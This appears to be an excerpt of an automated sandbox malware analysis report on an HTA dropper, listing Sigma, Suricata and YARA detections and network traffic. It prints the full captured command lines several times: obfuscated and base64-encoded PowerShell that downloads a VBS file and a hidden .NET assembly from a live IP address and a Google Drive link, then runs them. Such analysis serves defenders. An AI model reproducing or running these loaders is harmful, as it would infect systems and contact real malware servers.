'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0Jysn
            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6512, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline", ProcessId: 4832, ProcessName: csc.exe
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6512, TargetFilename: C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowse
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6512, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , ProcessId: 6408, ProcessName: wscript.exe
            Sigma detected: Dynamic CSharp Compile Artefact
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6512, TargetFilename: C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", CommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICA
            Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowse

            Data Obfuscation

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6512, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline", ProcessId: 4832, ProcessName: csc.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-30T08:24:09.643172+010028587951A Network Trojan was detected192.168.2.549704198.46.178.15180TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: greatthingswithmegood.htaReversingLabs: Detection: 21%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.2% probability

            Phishing

            barindex
            Yara detected HtmlPhish44
            Source: Yara matchFile source: greatthingswithmegood.hta, type: SAMPLE
            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2102346402.00000000076F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2212744415.00000000073D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.2212744415.00000000073D4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000009.00000002.2212744415.00000000073D4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2102626635.000000000776B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.2214216326.00000000074A6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \dll\mscorlib.pdb( source: powershell.exe, 00000009.00000002.2213867758.0000000007485000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: l\mscorlib.pdb source: powershell.exe, 00000009.00000002.2213867758.0000000007485000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000009.00000002.2212744415.00000000073D4000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.5:49704 -> 198.46.178.151:80
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: GET /66/seemethebestthingswithgreatneedswithgoodformewith.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 198.46.178.151Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
